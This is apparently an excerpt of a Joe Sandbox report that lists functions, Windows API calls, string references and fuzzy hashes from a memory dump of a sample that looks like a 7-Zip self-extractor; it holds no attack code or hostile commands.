KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

Strings

Static, xrefs: 00401B5A

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298

Strings

, xrefs: 0040B22D

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-3916222277
Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
wsprintfW.USER32 ref: 004044A7

Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

#17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533

Strings

IA, xrefs: 0040447B
7zSfxFolder%02d, xrefs: 004044A1

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d$IA
API String ID: 3387708999-1317665167
Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59

Strings

IA, xrefs: 00409391
IA, xrefs: 00409225

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@
String ID: IA$IA
API String ID: 1033339047-1400641299
Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00410D0D

Strings

4KA, xrefs: 00410CF0
\KA, xrefs: 00410CE2
HKA, xrefs: 00410CE9
$KA, xrefs: 00410CF7

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: free
String ID: $KA$4KA$HKA$\KA
API String ID: 1294909896-3316857779
Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004096D0
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941

Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B

Strings

HIA, xrefs: 0040978B

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: HIA
API String ID: 3431946709-2712174624
Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
memcmp.MSVCRT(?,?,?), ref: 004028E4
memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000011,?,00405D20,?,00417788,00417788), ref: 00404A5A
??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC

Strings

ExecuteFile, xrefs: 00404A48

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@
String ID: ExecuteFile
API String ID: 1033339047-323923146
Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A

Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E

Strings

@, xrefs: 00402471

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D

Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@$??2@ExceptionThrowmemmove
String ID:
API String ID: 4269121280-0
Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99

Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A634
??3@YAXPAX@Z.MSVCRT(?), ref: 0040A729

Memory Dump Source

Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_hello.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B

Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

Memory Dump Source

